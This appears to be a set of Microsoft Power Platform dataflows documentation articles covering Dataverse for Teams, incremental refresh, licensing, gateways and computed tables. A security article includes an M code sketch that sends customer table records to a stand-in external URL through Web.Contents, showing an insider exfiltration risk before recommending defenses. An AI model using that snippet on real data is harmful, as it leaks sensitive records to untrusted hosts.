Dataverse or Azure Data Lake Storage—which means that data ingested through
dataflows is now available to data engineers and data scientists to leverage the full
power of Azure Data Services, such as Azure Machine Learning, Azure Databricks,
and Azure Synapse Analytics for advanced analytics and AI. This enables business
analysts, data engineers, and data scientists to collaborate on the same data within
their organization.
Support for Common Data Model: Common Data Model is a set of a standardized
data schemas and a metadata system to allow consistency of data and its meaning
across applications and business processes. Dataflows support Common Data
Model by offering easy mapping from any data in any shape into the standard
Common Data Model entities, such as Account and Contact. Dataflows also land
the data, both standard and custom entities, in schematized Common Data Model
form. Business analysts can take advantage of the standard schema and its
semantic consistency, or customize their entities based on their unique needs.
Common Data Model continues to evolve as part of the Open Data Initiative .
Dataflows Data Connector in Power BI Desktop | For dataflows with Azure Data Lake Storage as the destination | Yes
Dataflow linked entities | For dataflows with Azure Data Lake Storage as the destination | Yes
Computed Entities (in-storage transformations using M) | For dataflows with Azure Data Lake Storage as the destination | Power BI Premium only
Dataflow incremental refresh | For dataflows with Azure Data Lake Storage as the destination; requires Power Apps Plan 2 | Power BI Premium only
Known limitations
Copying dataflows as part of a Power Platform environments copy operation is not
supported.
Next steps
More information about dataflows in Power Apps:
The following articles go into more detail about common usage scenarios for dataflows.
For more information about Common Data Model and the Common Data Model folder
standard, read the following articles:
Microsoft Dataverse for Teams delivers a built-in, low-code data platform for Microsoft
Teams. It provides relational data storage, rich data types, enterprise-grade governance,
and one-click solution deployment. Dataverse for Teams enables everyone to easily
build and deploy apps.
Previously, the way to get data into Dataverse for Teams was by manually adding data
directly into a table. This process can be prone to errors and isn't scalable. But now, with
self-service data prep you can find, clean, shape, and import your data into Dataverse
for Teams.
With your organizational data already sitting in a different location, you can use Power
Query dataflows to directly access your data through the connectors and load the data
into Dataverse for Teams. When your organizational data is updated, you can refresh
your dataflows with just one click and the data in Dataverse for Teams is updated too.
You can also use the Power Query data transformations to easily validate and clean your
data and enforce data quality for your apps.
Dataflows were introduced to help organizations retrieve data from disparate sources
and prepare it for consumption. You can easily create dataflows using the familiar, self-
service Power Query experience to ingest, transform, integrate, and enrich data. When
creating a dataflow, you'll connect to data, transform the data, and load data into
Dataverse for Teams tables. Once the dataflow is created, it begins the process of
importing data into the Dataverse table. Then you can start building apps to leverage
that data.
1. Sign in to Teams web version , and then select the link for Power Apps.
6. In Navigator, select the tables that are present in your Excel file. If your Excel file
has multiple sheets and tables, select only the tables you're interested in. When
you're done, select Transform data.
7. Clean and transform your data using Power Query. You can use the out-of-the-box
transformations to delete missing values, delete unnecessary columns, or to filter
your data. With Power Query, you can apply more than 300 different
transformations on your data. To learn more about Power Query transformations,
see Use Power Query to transform data. After you're finished with preparing your
data, select Next.
8. In Map tables, select Load to new table to create a new table in Dataverse for
Teams. You can also choose to load your data into an existing table. In the Map
tables screen, you can also specify a Unique primary name column and an
Alternate key column (optional). In this example, leave these selections with the
default values. To learn more about mapping your data and the different settings,
see Field mapping considerations for standard dataflows.
9. Select Create to finish your dataflow. Once you’ve created your dataflow, data
begins loading into Dataverse for Teams. This process can take some time and you
can use the management page to check the status. When a dataflow completes a
run, its data is available to use.
In the Last Refresh column, you can see when your data was last refreshed. If your
refresh failed, an error indication appears. If you select the error indication, the details of
the error and recommended steps to address it appear.
In the Status column, you can see the current status of the dataflow. Possible states are:
Refresh in progress: the dataflow is extracting, transforming, and loading your
data from the source to the Dataverse Tables. This process can take several
minutes depending on the complexity of transformations and data source's
performance. We recommend that you check the status of the dataflow frequently.
To navigate to the action bar, select the three dots “…” next to your dataflow.
Edit your dataflow if you want to change your transformation logic or mapping.
Rename your dataflow. At creation, an autogenerated name is assigned.
Refresh your dataflow. When you refresh your dataflows, the data will be updated.
Delete your dataflow.
Show refresh history. This gives you the results from the last refresh.
Select Show refresh history to see information about the last refresh of your dataflow.
When the dataflow refresh is successful, you can see how many rows were added or
updated in Dataverse. When your dataflow refresh wasn't successful, you can investigate
why with the help of the error message.
7 Note
The following table lists the major feature differences between dataflows for Dataverse
in Teams and dataflows for Dataverse.
1 Although there's no limitation on the amount of data you can load into Dataverse for
Teams, for better performance in loading larger amounts of data, we recommend a
Dataverse environment.
Consume data from dataflows
Article • 08/04/2023
The ways you can consume data from Microsoft dataflows depend on several factors,
like storage and type of dataflow. In this article, you learn how to choose the right
dataflow for your needs.
Type of dataflow
There are multiple types of dataflows available for you to create. You can choose
between a Power BI dataflow, standard dataflow, or an analytical dataflow. To learn more
about the differences and how to select the right type based on your needs, go to
Understanding the differences between dataflow types.
Storage type
A dataflow can write to multiple output destination types. In short, you should use
the Dataflows connector unless your destination is a Dataverse table, in which case you
use the Dataverse/CDS connector.
When you've connected your data lake, you should still use the Dataflows connector. If
this connector doesn't meet your needs, you could consider using the Azure Data Lake
connector instead.
Dataverse
A standard dataflow writes the output data to a Dataverse table. Dataverse lets you
securely store and manage data that's used by business applications. After you load
data in the Dataverse table, you can consume the data using the Dataverse connector.
Dataflows can get data from other dataflows
If you'd like to reuse data created by one dataflow in another dataflow, you can do so by
using the Dataflow connector in the Power Query editor when you create the new
dataflow.
When you get data from the output of another dataflow, a linked table is created.
Linked tables provide a way to make data created in an upstream dataflow available in a
downstream dataflow, without copying the data to the downstream dataflow. Because
linked tables are just pointers to tables created in other dataflows, they're kept up to
date by the refresh logic of the upstream dataflow. If both dataflows reside in the same
workspace or environment, those dataflows are refreshed together, to keep data in both
dataflows always up to date. More information: Link tables between dataflows
You're probably using a Dataverse table as the destination for your standard dataflow.
Use the Dataverse/CDS connector instead or consider switching to an analytical
dataflow.
There's a difference in the data when I remove duplicates in dataflows—how can I
resolve this?
Next steps
The following articles provide more details about related topics.
When you include your dataflows in a solution, their definitions become portable,
making it easier to move them from one environment to another, saving time required
to author the dataflow.
A typical use case is for an independent software vendor (ISV) to develop a solution
containing a dataflow, that extracts and transforms data from a data source to Dataverse
tables, in a sandbox environment. The ISV would then move that dataflow and
destination tables to a test environment to test with their test data source to validate
that the solution works well and is ready for production. After testing completes, the ISV
would provide the dataflow and tables to clients who will import them into their
production environment to operate on client’s data. This process is much easier when
you add both the dataflows and tables they load data to into solutions, and then move
the solutions and their contents between environments.
Dataflows added to a solution are known as solution-aware dataflows. You can add
multiple dataflows to a single solution.
Prerequisites
You need to have created a solution before you can add a dataflow to it. More
information: Create solutions
You need to be the owner of at least one dataflow in the environment. More
information: Create dataflows
Add the dataflow
1. Sign in to Power Apps .
3. Select the solution you'll add your dataflow to, and from the context menu select
Edit.
5. Optional: If your dataflow loads data into a custom Dataverse table, add the
custom table to the solution as well.
In this example, the dataflow you added to the solution loads data into a custom
table called Full Order Details, which you want to also include in the solution with
the dataflow.
Once both the dataflow and the table it loads data to are added to the solution, the
solution contains those two artifacts. In this case, the artifacts are
cr0c8_FullOrderDetails and Import Sales Data.
To save your work, be sure to publish all customizations. Now, the solution is ready
for you to export from the source environment and import to the destination
environment.
1. On the left navigation pane, select the down arrow next to Dataverse and select
Dataflows. Identify the dataflow that was imported, and select Edit from the
context menu.
2. In the Dataflow list, locate and double-click the dataflow that was added as part of
the solution you’ve imported.
Once the credentials for the connection have been updated, all queries that use
that connection automatically load.
4. If your dataflow loads data in Dataverse tables, select Next to review the mapping
configuration.
5. The mapping configuration is also saved as part of the solution. Since you also
added the destination table to the solution, there's no need to recreate the table
in this environment and you can publish the dataflow.
That's it. Your dataflow now refreshes and loads data to the destination table.
Known limitations
Dataflows can't be created from within solutions. To add a dataflow to a solution,
follow the steps outlined in this article.
Dataflows can't be edited directly from within solutions. Instead, the dataflow must
be edited in the dataflows experience.
Dataflows can't use connection references for any connector.
Environment variables can't be used by dataflows.
Dataflows don't support adding required components, such as custom tables they
load data to. Instead, the custom table should be manually added to the solution.
Dataflows can't be deployed by application users (service principals).
Incremental refresh configuration isn't supported when deploying solutions. After
deployment of the dataflow via solution, the incremental refresh configuration
should be reapplied.
Linked tables to other dataflows aren't supported when deploying solutions. After
deployment of the dataflow via solution, edit the dataflow and update the
connection to the linked dataflow.
Using incremental refresh with
dataflows
Article • 08/04/2023
With dataflows, you can bring large amounts of data into Power BI or your
organization's provided storage. In some cases, however, it's not practical to update a
full copy of source data in each refresh. A good alternative is incremental refresh, which
provides the following benefits for dataflows:
Refresh occurs faster: Only data that's changed needs to be refreshed. For
example, refresh only the last five days of a 10-year dataflow.
Refresh is more reliable: For example, it's not necessary to maintain long-running
connections to volatile source systems.
Resource consumption is reduced: Less data to refresh reduces overall
consumption of memory and other resources.
7 Note
When the schema for a table in an analytical dataflow changes, a full refresh takes
place to ensure that all the resulting data matches the new schema. As a result, any
data stored incrementally is refreshed and in some cases, if the source system
doesn't retain historic data, is lost.
Using incremental refresh in dataflows created in Power BI requires that the dataflow
reside in a workspace in Premium capacity. Incremental refresh in Power Apps requires
Power Apps per-app or per-user plans, and is only available for dataflows with Azure
Data Lake Storage as the destination.
In either Power BI or Power Apps, using incremental refresh requires that source data
ingested into the dataflow have a DateTime field on which incremental refresh can filter.
When you select the icon, the Incremental refresh settings window appears. Turn on
incremental refresh.
The following list explains the settings in the Incremental refresh settings window.
Incremental refresh on/off toggle: Turns the incremental refresh policy on or off
for the table.
Filter field drop-down: Selects the query field on which the table should be filtered
for increments. This field only contains DateTime fields. You can't use incremental
refresh if your table doesn't contain a DateTime field.
Store/refresh rows from the past: The example in the previous image illustrates
these next few settings.
In this example, we define a refresh policy to store five years of data in total and
incrementally refresh 10 days of data. Assuming that the table is refreshed daily,
the following actions are carried out for each refresh operation:
Remove calendar years that are older than five years before the current date.
For example, if the current date is January 1, 2019, the year 2013 is removed.
The first dataflow refresh might take a while to import all five years, but
subsequent refreshes are likely to be completed much more quickly.
Tip
The current design requires that the column used to detect data changes be
persisted and cached into memory. You might want to consider one of the
following techniques to reduce cardinality and memory consumption:
Persist only the maximum value of this column at time of refresh, perhaps
by using a Power Query function.
Reduce the precision to a level that's acceptable given your refresh-
frequency requirements.
Only refresh complete periods: Imagine that your refresh is scheduled to run at
4:00 AM every day. If data appears in the source system during those first four
hours of that day, you might not want to account for it. Some business metrics,
such as barrels per day in the oil and gas industry, aren't practical or sensible to
account for based on partial days.
After incremental refresh is configured, the dataflow automatically alters your query to
include filtering by date. If the dataflow was created in Power BI, you can also edit the
automatically generated query by using the advanced editor in Power Query to fine-
tune or customize your refresh. Read more about incremental refresh and how it works
in the following sections.
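To illustrate the earlier tip about the change-detection column, here's a hedged M sketch; the Source step and the ModifiedOn column name are placeholders, and the actual date filtering that incremental refresh injects is handled for you and looks different:

let
    Source = Sales,   // placeholder for your source query
    // Reduce precision: truncate the time portion so far fewer distinct values need to be cached
    Reduced = Table.TransformColumns(Source, {{"ModifiedOn", each DateTime.From(DateTime.Date(_)), type datetime}}),
    // Alternatively, persist just the single maximum value observed at refresh time
    MaxModified = List.Max(Source[ModifiedOn])
in
    Reduced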
Computed tables are based on queries running over a data store, which can be another
dataflow. As such, computed tables behave the same way as linked tables.
Because computed tables and linked tables behave similarly, the requirements and
configuration steps are the same for both. One difference is that for computed tables, in
certain configurations, incremental refresh can't run in an optimized fashion because of
the way partitions are built.
When moving a dataflow from full refresh to incremental, the new refresh logic updates
the dataflow by adhering to the refresh window and increment as defined in the
incremental refresh settings.
When moving a dataflow from incremental to full refresh, all data accumulated in the
incremental refresh is overwritten by the policy defined in the full refresh. You must
approve this action.
In the case where a scheduled refresh is defined in the system, incremental refresh
uses the time-zone settings from the scheduled refresh section. This ensures that
whatever time zone the person refreshing the dataflow is in, it will always be
consistent with the system's definition.
If no scheduled refresh is defined, dataflows use the time zone from the computer
of the user who's performing the refresh.
Incremental refresh can also be invoked by using APIs. In this case, the API call can hold
a time-zone setting that's used in the refresh. Using APIs can be helpful for testing and
validation purposes.
Merge partitions
In this example, day partitions are automatically merged to the month level after they
go outside the incremental range. Partitions in the incremental range need to be
maintained at daily granularity to allow only those days to be refreshed. The refresh
operation with Run Date 12/11/2016 merges the days in November, because they fall
outside the incremental range.
The next refresh operation, with Run Date 1/16/2017, takes the opportunity to merge
the days in December and the months in Q4 of 2016.
Both approaches work according to your specified definitions in the refresh settings.
More information: Incremental refresh in Power BI Premium
See also
This article described incremental refresh for dataflows. Here are some more articles that
might be useful:
For more information about Common Data Model, you can read its overview article:
With Microsoft Power BI and Power Platform dataflows, you can connect to many
different data sources to create new dataflows, or add new entities to an existing
dataflow.
This article describes how to create dataflows by using these data sources. For an
overview of how to create and use dataflows, go to Creating a dataflow for Power BI
service and Create and use dataflows in Power Apps.
Power BI service
1. Open a workspace.
2. Select New.
3. Select Dataflow from the drop-down menu.
4. Under Define new tables, select Add new tables.
The available data source categories include:
All categories
File
Database
Power Platform
Azure
Online Services
Other
For a list of all of the supported data sources in Power Query, go to Connectors in Power
Query.
After the server URL or resource connection information is provided, enter the
credentials to use for access to the data. You may also need to enter the name of an on-
premises data gateway. Then select Next.
Power Query Online initiates and establishes the connection to the data source. It then
presents the available tables from that data source in the Navigator window.
You can select tables and data to load by selecting the check box next to each in the left
pane. To transform the data you've chosen, select Transform data from the bottom of
the Navigator window. A Power Query Online dialog box appears, where you can edit
queries and perform any other transformations you want to the selected data.
2. Open Power Query Editor in Power BI Desktop, right-click the relevant query, and
then select Advanced Editor, as shown in the following image. From there, you can
copy the M script that appears in the Advanced Editor window.
3. Open the Power BI dataflow, and then select Get data for a blank query.
4. Paste the copied query into the blank query for the dataflow.
Your script then connects to the data source you specified.
The following list shows which connectors you can currently use by copying and pasting
the M query into a blank query:
Next steps
This article showed which data sources you can connect to for dataflows. The following
articles go into more detail about common usage scenarios for dataflows:
For information about individual Power Query connectors, go to the connector reference
list of Power Query connectors, and select the connector you want to learn more about.
Additional information about dataflows and related information can be found in the
following articles:
For more information about Power Query and scheduled refresh, you can read these
articles:
For more information about Common Data Model, you can read its overview article:
Dataflows can be created in different portals, such as Power BI and Power Apps, and
can be of either analytical or standard type. In addition, some dataflow features are only
available as Premium features. Considering the wide range of products that can use
dataflows, and feature availability in each product or dataflow type, it's important to
know what licensing options you need to use dataflows.
If you want to create analytical dataflows that store data in your organization's Azure
Data Lake Storage Gen2 account, you or your administrator need access to an Azure
subscription and an Azure Data Lake Storage Gen2 account.
Premium features
Some of the dataflow features are limited to premium licenses. If you want to use the
enhanced compute engine to speed up your dataflow queries' performance over
computed tables, or have the DirectQuery connection option to the dataflow, you need
to have Power BI P1 or A3 or higher capacities.
AI capabilities in Power BI, linked table, and computed table are all premium functions
that aren't available with a Power BI Pro account.
List of features
The following table contains a list of features and the license needed for them to be
available.
Store data in Dataverse tables (standard dataflow) | N/A | Per app plan, Per user plan
Store data in Azure Data Lake Storage (analytical dataflow) | Yes | Yes, using analytical dataflows
Store data in customer provided Azure Data Lake Storage (analytical dataflow; bring your own Azure Data Lake Storage) | Yes | Per app plan, Per user plan
The Power Apps per-app plan covers up to a 50-MB database capacity. The Power Apps
per-user plan allows you to have a database of 250-MB capacity.
Power BI Pro
Power BI Pro gives you the ability to create analytical dataflows, but not use any of the
premium features. With a Power BI Pro account, you can't use linked or computed
tables, you can't use AI capabilities in Power BI, and you can't use DirectQuery to
connect to the dataflow. The storage for your dataflows is limited to the space left under
your Power BI Pro account, which is a subset of 10-GB storage for all Power BI content.
Currently, the storage used by dataflows isn't reported in the Power BI portal. You'll be
notified when you've almost reached the limit of the remaining capacity.
Power BI Premium
If you use Power BI Premium (capacity-based licensing), you can use all the AI
capabilities in Power BI, computed tables and linked tables, with the ability to have a
DirectQuery connection to the dataflow. You can also use the enhanced compute
engine. However, a dataflow created under a premium capacity license uses only the
internal Azure Data Lake Storage, and isn't accessible by platforms other than Power
BI itself. You can't create external dataflows just by having a Power BI Premium license;
you need to have an Azure subscription for Azure Data Lake Storage as well.
Dataflows that are using a premium capacity to refresh the data are limited to the
maximum number of parallel tasks they can perform at a given time. The maximum
number of parallel tasks depends on the type of premium capacity you're using. This
table represents the maximum number of parallel tasks that can be run at a given time
by all dataflows in a workspace mapped to the capacity.
Parallel tasks
A premium capacity can run multiple evaluations in parallel. For example, you have a P4
capacity and a dataflow that consists of 84 tasks. You refresh your dataflow and the first
64 tasks are allocated for the refresh. The remaining 20 evaluations for this dataflow are
parked in a queue. As each evaluation finishes, the next evaluation in the queue starts.
If you start another dataflow in your workspace on the same premium capacity while the
first is still running, its evaluations are parked in the same queue for the premium
capacity and must wait for the other dataflow's evaluations in the workspace to finish
before the refresh of your data starts.
You can use the following pointers to estimate the number of tasks of your dataflow
refresh:
The number of queries executed in the refresh (don't forget the upstream linked
tables).
Each partition in an incremental refresh query counts as an extra task.
To lower the number of tasks or improve the efficiency of your tasks, you can use the
following strategies:
Lower the number of queries in your dataflow by combining queries where
possible and only "enable load" for queries that are used downstream.
Evaluate if you really need the upstream linked tables to refresh automatically.
Strategically schedule your dataflow refreshes based on the number of tasks.
Make sure your query returns the minimum set of columns and rows to satisfy
your data need. The faster and more efficiently the task executes, the sooner the
next task can start.
Next step
If you want to read more details about the concepts discussed in this article, go to any
of the following links.
Pricing
Power BI pricing
Power Apps pricing
Azure Data Lake Storage Gen 2 pricing
Features
Computed tables
Linked tables
AI capabilities in Power BI dataflows
Standard vs. analytical dataflows
The enhanced compute engine
How to migrate queries from Power
Query in the desktop (Power BI and
Excel) to dataflows
Article • 02/17/2023
If you already have queries in Power Query, either in Power BI Desktop or in Excel, you
might want to migrate the queries into dataflows. The migration process is simple and
straightforward. In this article, you'll learn the steps to do so.
To learn how to create a dataflow in Microsoft Power Platform, go to Create and use
dataflows in Power Platform. To learn how to create a dataflow in Power BI, go to
Creating and using dataflows in Power BI.
In Excel, on the Data tab, select Get Data > Launch Power Query Editor.
2. Copy the queries:
If you've organized your queries into folders (called groups in Power Query):
a. In the Queries pane, select Ctrl as you select the folders you want to migrate to
the dataflow.
b. Select Ctrl+C.
If you don't have folders:
a. In the Queries pane, select Ctrl as you select the queries you want to migrate.
b. Select Ctrl+C.
3. Paste the copied queries into a dataflow:
b. Open the dataflow in Power Query Editor, and in the Queries pane, select
Ctrl+V to paste the copied folders or queries.
The image below shows an example of successfully copied folders.
If your data source is an on-premises source, you need to perform an extra step.
Examples of on-premises sources can be Excel files in a shared folder in a local
domain, or a SQL Server database hosted in an on-premises server.
The gateway isn't needed for data sources residing in the cloud, such as an Azure
SQL database.
If you've done all the steps successfully, you'll see a preview of the data in the
Power Query Editor.
Install an on-premises data gateway to transfer data quickly and securely between a
Power Platform dataflow and a data source that isn't in the cloud, such as an on-
premises SQL Server database or an on-premises SharePoint site. You can view all
gateways for which you have administrative permissions and manage permissions and
connections for those gateways.
Prerequisites
Power BI service
A Power BI service account. Don't have one? Sign up for 60 days free.
Power Apps
A Power Apps account. Don't have one? Sign up for 30 days free.
Install a gateway
You can install an on-premises data gateway directly from the online service.
7 Note
It's a good general practice to make sure you're using a supported version of
the on-premises data gateway. We release a new update of the on-premises
data gateway every month. Currently, Microsoft actively supports only the last
six releases of the on-premises data gateway.
Starting April 2022, the minimum required gateway version is February
2021. Dataflows that refresh using an earlier version of the gateway might
stop refreshing.
1. Select the downloads button in the upper right corner of Power BI service, and
choose Data Gateway.
2. Install the gateway using the instructions provided in Install an on-premises data
gateway.
3. Provide the connection details for the enterprise gateway that will be used to
access the on-premises data. You must select the gateway itself, and provide
credentials for the selected gateway. Only gateways for which you're an
administrator appear in the list.
You can change the enterprise gateway used for a given dataflow and change the
gateway assigned to all of your queries using the dataflow authoring tool.
7 Note
The dataflow will try to find or create the required data sources using the new
gateway. If it can't do so, you won't be able to change the gateway until all needed
data sources are available from the selected gateway.
1. If we detect that an existing data source is available for the selected gateway, the
Username and Password fields will be pre-populated.
a. If you select Next at this point, you're considered to be using that existing data
source, and so you only need to have permissions to that data source.
b. If you edit any of the credential fields and select Next, then you're considered to
be editing that existing data source, at which point you need to be an admin of
the gateway.
2. If we don't detect that an existing data source is available for the selected gateway,
the Username and Password fields will be blank, and if you edit the credential
fields and select Next, then you're considered to be creating a new data source on
the gateway, at which point you need to be an admin of the gateway.
If you only have data source user permission on the gateway, then 1.b and 2 can't be
achieved and the dataflow can't be created.
2. To add a user to a gateway, select Users, specify a user or group, and then specify
a permission level. Creating new data sources with a gateway in dataflows requires
Admin permission on the gateway. Admins have full control of the gateway,
including adding users, setting permissions, creating connections to all available
data sources, and deleting the gateway.
To view details and edit the settings, select Gateway Cluster Settings.
To add users as administrators of the gateway, select Administrators.
To add a data source to the gateway, select Add Data Source, enter a data
source name and choose the data source type under Data Source Settings,
and then enter the email address of the person who will use the data source.
To delete a gateway, select the ellipsis to the right of the gateway name and
then select Remove.
To view details, edit the settings, or delete a gateway, select Connections, and
then select a connection.
You can only share some types of connections, such as a SQL Server
connection. For more information, see Share canvas-app resources in
Power Apps.
Limitations
There are a few known limitations when using enterprise gateways and dataflows.
Dataflow refresh might fail if an out-of-date data gateway is used. Starting April
2022, the minimum required data gateway version is February 2021.
Each dataflow can use only one gateway. As such, all queries should be configured
using the same gateway.
If several gateways are needed, the best practice is to build several dataflows (one
for each gateway). Then use the compute or table reference capabilities to unify
the data.
Dataflows are only supported using enterprise gateways. Personal gateways won't
be available for selection in the drop-down lists and settings screens.
Creating new data sources with a gateway in dataflows is only supported for
people with Admin permissions.
Users with Can Use or Can Use + Share permissions can use existing connections
when creating dataflows.
Troubleshooting
When you attempt to use an on-premises data source to publish a dataflow, you might
come across the following MashupException error:
This error usually occurs because you're attempting to connect to an Azure Data Lake
Storage endpoint through a proxy, but you haven't properly configured the proxy
settings for the on-premises data gateway. To learn more about how to configure these
proxy settings, go to Configure proxy settings for the on-premises data gateway.
For more information about troubleshooting issues with gateways, or configuring the
gateway service for your network, go to the On-premises data gateway documentation.
If you're experiencing issues with the gateway version you're using, try updating to the
latest version as your issue might have been resolved in the latest version. For more
information about updating your gateway, go to Update an on-premises data gateway.
Next steps
Create and use dataflows in Power Apps
Fabric dataflows and Power Platform dataflows are Microsoft 365 services that enable
users to easily connect to, extract, move, and transform data across hundreds of
supported data sources. Dataflows build upon an underlying service called Power Query
Online, which hosts the data movement engine (Mashup Engine) as a cloud service. By
default, connectivity originates from this cloud location and has unrestricted access to
the internet. Therefore, when using dataflows to access and move sensitive data,
organizations should consider strategies to deter insiders from accidental or malicious
data exfiltration. This article outlines known risk factors and best practices for
safeguards.
Considerations
A trusted user who has access to sensitive data can author a program to push the data
to an untrusted data store. Since the Mashup Engine runs entirely in the cloud, it doesn't
go through corporate firewalls and proxy servers. So, it isn't subject to any data loss
prevention (DLP) policies that might be enforced by these networks. Since the point of
access is on the public internet, data can travel to any destination that the user has
access to—either through authentication or anonymous access. Here are some
examples of ways in which these programs can exfiltrate sensitive data:
Anonymous web requests: By using Web.Contents, users can make web requests
with sensitive data in the body of the request (a minimal sketch follows this list).
Cross data source filtering and joins: Sensitive data can be used as filtering or join
conditions against another untrusted data source. Specifically, data can travel to
the untrusted data source in the form of query strings or parameters.
Output destinations: By using Fabric dataflows, users can specify output
destinations for their queries, thereby transferring data to a list of supported data
sinks, which includes Azure SQL databases and data warehouses, Fabric
Lakehouses, Warehouses, and KQL databases.
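To make the first of these risks concrete, the following minimal M sketch (the source, table, and destination URL are all hypothetical) shows how Web.Contents can place query results in the body of an outbound web request:

let
    Source = Sql.Database("sales-srv", "SalesDB"),
    Customers = Source{[Schema = "dbo", Item = "Customers"]}[Data],
    // Serialize a slice of the data and send it to an arbitrary endpoint.
    Payload = Json.FromValue(Table.ToRecords(Table.FirstN(Customers, 100))),
    Response = Web.Contents(
        "https://example.com/collect",  // hypothetical untrusted destination
        [Content = Payload, Headers = [#"Content-Type" = "application/json"]]
    )
in
    Response

Because the request originates from the cloud Mashup Engine by default, no corporate firewall or DLP policy inspects it, which is the scenario the following sections address.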
Network isolation
We recommend that all data stores containing sensitive data be network isolated to
permit access only from selected networks. This isolation restriction must be defined
and operated at the network layer or lower. For example, layer 3 firewalls, Network
Security Groups (NSGs), and Azure Private Links are good examples of mechanisms that
can be used. However, location-based conditional access policies in Azure Active
Directory (Azure AD) operate at the application layer and are considered insufficient for
this purpose.
These network isolation policies must obstruct line of sight from dataflows' cloud
execution engine to sensitive data stores (since the cloud engine runs on the public
internet). Dataflows' connectivity to these data stores is then forced to originate from
within one of the permitted networks by binding connections to an on-premises data
gateway or VNet data gateway. An important execution characteristic of dataflows is
that cloud-based evaluation and gateway-based evaluation are never blended. If a
dataflow needs to access a network isolated data store (and is therefore bound to a
gateway), all data access is then required to flow through the gateway. Additionally,
since gateways physically reside in networks controlled by the user tenant, they comply
with network level restrictions such as firewalls and DLP protection solutions. These
restrictions make gateway environments as secure and safe as any corporate managed
devices and mitigate risks associated with arbitrary code execution in a cloud
environment.
It's worth noting that network isolation must be applied to all data stores that might
contain sensitive data. Consider an example where a user creates a dataflow to read
data from OneDrive for Business into Power BI. Then the user later creates a linked
dataflow to transform the data in Power BI into downstream entities. In this scenario, it's
not sufficient to just isolate OneDrive for Business to trusted networks. Since sensitive
data might also reside within Power BI, it's important to isolate such data by enabling
private links and disabling public Internet access for Power BI. Learn more about secure
access to Power BI using private endpoints.
Force gateway execution
The goal of isolating sensitive data stores to selected networks is to force the origin of
access back to trusted networks, so that existing policies governing managed devices
can be used to govern data movement from dataflows. In certain cases, a full network
isolation solution might take time to develop, test, and deploy. As an alternative, you
can file a dataflows support ticket to apply a tenant-wide policy that turns off the
Mashup Engine. This policy affects all query evaluations that use the Power Query
Online Mashup Engine. Impacted capabilities include:
Fabric dataflows
Power Platform dataflows
Azure Data Factory wrangling dataflows
Dataflows in Dynamics 365 (Customer Insights, Intelligent Order Management, and
so on)
Power BI Datamart
Power BI Quick Import from SharePoint
After application of the policy, all cloud-based execution fails with the following error:
Cloud evaluation request denied based on tenant policies. Please use a data gateway
and try again. This error effectively forces all query evaluations in the tenant to occur
on gateways, without first rolling out a full network isolation solution. Note that the
policy is applied to the entire tenant and not a subset of workloads. This policy means
existing workloads fail immediately and require manual intervention to convert to run
on gateways. Organizations applying this policy should also ensure that they have
enough capacity in their gateway clusters to accommodate all their workloads.
Tenant isolation
For most software-as-a-service (SaaS) layer data stores, such as Fabric Lakehouse and
Power Platform Dataverse, there's usually a multi-tenant endpoint that one
communicates with to gain access to the data. These endpoints are common across all
users of the service, so they can be difficult to isolate and protect solely using network
(Layer 3) isolation techniques. The recommended approach for this kind of data store is
to use Layer 7 policies, typically provided by Azure Active Directory.
This approach restricts access to the tenant’s sensitive data stores to a set of managed
devices where signing into another tenant isn't permitted, effectively isolating data
movement across the tenant.
Roadmap
The following list contains some of the features that are currently planned to help
organizations better manage data exfiltration risks in Fabric:
Data source connection allowlisting: Allows Fabric tenant admins to control the
kinds of connectors that can be used within the tenant, and the endpoints the
connectors can connect to.
Connection usage auditing: Support for auditing logs that track connection
creation, updating, deletion, and usage.
Creating computed tables in dataflows
Article • 08/04/2023
You can perform in-storage computations when using dataflows with a Power BI
Premium subscription. This lets you do calculations on your existing dataflows, and
return results that enable you to focus on report creation and analytics.
To perform in-storage computations, you first must create the dataflow and bring data
into that Power BI dataflow storage. After you have a dataflow that contains data, you
can create computed tables, which are tables that do in-storage computations.
There are two ways you can connect dataflow data to Power BI:
The following sections describe how to create computed tables on your dataflow data.
In the dataflow authoring tool in the Power BI service, select Edit tables. Then right-click
the table you want to use as the basis for your computed table and on which you want
to perform calculations. On the shortcut menu, select Reference.
For the table to be eligible as a computed table, Enable load must be selected, as shown
in the following image. Right-click the table to display this shortcut menu.
By selecting Enable load, you create a new table whose source is the referenced table.
The icon changes to the computed icon, as shown in the following image.
Any transformation you do on this newly created table will be run on the data that
already resides in Power BI dataflow storage. That means that the query won't run
against the external data source from which the data was imported (for example, the
SQL database from which the data was pulled).
Consider the following example. You have an Account table that contains the raw data
for all the customers from your Dynamics 365 subscription. You also have ServiceCalls
raw data from the service center, with data from the support calls that were performed
from the different accounts on each day of the year.
Imagine you want to enrich the Account table with data from ServiceCalls.
First you would need to aggregate the data from the ServiceCalls to calculate the
number of support calls that were done for each account in the last year.
Next, you merge the Account table with the ServiceCallsAggregated table to calculate
the enriched Account table.
Then you can see the results, shown as EnrichedAccount in the following image.
And that's it—the transformation is done on the data in the dataflow that resides in your
Power BI Premium subscription, not on the source data.
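As a rough sketch of what those steps might produce in M (the table and column names are assumed from this example), the Group By and Merge could look like the following two queries, both running against the data already stored in the dataflow:

// Query "ServiceCallsAggregated": counts support calls per account.
let
    Source = ServiceCalls,
    Aggregated = Table.Group(Source, {"AccountID"},
        {{"SupportCallsLastYear", each Table.RowCount(_), type number}})
in
    Aggregated

// Query "EnrichedAccount": merges the aggregate back onto Account.
let
    Source = Account,
    Merged = Table.NestedJoin(Source, {"AccountID"},
        ServiceCallsAggregated, {"AccountID"}, "Calls", JoinKind.LeftOuter),
    Expanded = Table.ExpandTableColumn(Merged, "Calls", {"SupportCallsLastYear"})
in
    Expanded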
When working with dataflows specifically created in an organization's Azure Data Lake
Storage account, linked tables and computed tables only work properly when the tables
reside in the same storage account. More information: Connect Azure Data Lake Storage
Gen2 for dataflow storage
Linked tables are only available for dataflows created in Power BI and Power Apps. As a
best practice, when doing computations on data joined from on-premises and cloud
sources, create a new table to perform such computations. This provides a better
experience than using an existing table for computations, such as a table that is also
querying data from both sources and doing in-storage transformations.
See also
Computed table scenarios and use cases
This article described computed tables and dataflows. Here are some more articles that
might be useful:
The following links provide additional information about dataflows in Power BI and
other resources:
For more information about Power Query and scheduled refresh, you can read these
articles:
For more information about Common Data Model, you can read its overview article:
With dataflows in Microsoft Power Platform, you can have a single organizational data
storage source where business analysts can prep and manage their data once, and then
reuse it between different analytics apps in the organization.
When you link tables between dataflows, you can reuse tables that have already been
ingested, cleansed, and transformed by dataflows that are owned by others, without the
need to maintain that data. The linked tables simply point to the tables in other
dataflows, and don't copy or duplicate the data.
